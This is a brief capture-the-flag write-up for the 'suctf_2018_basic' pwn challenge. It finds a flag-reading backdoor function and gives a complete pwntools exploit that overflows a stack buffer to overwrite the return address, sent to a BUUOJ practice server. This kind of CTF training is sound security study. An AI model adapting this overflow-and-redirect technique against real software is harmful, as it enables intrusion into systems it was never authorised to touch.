suctf_2018_basic pwn
step
- Routine inspection, 64-bit program, open RELRO and NX
- Try running the program to see the general situation
- 64-bit ida was loaded, and the function to read the flag was found when searching the string, flag_addr=0x401157
main()
s overflowed, simply overwrite the return address to the problem of the backdoor function type
Full exp
from pwn import *
r=remote('node3.buuoj.cn',25779)
flag_addr=0x401157
payload='a'*(0x110+8)+p64(flag_addr)
r.sendline(payload)
r.interactive()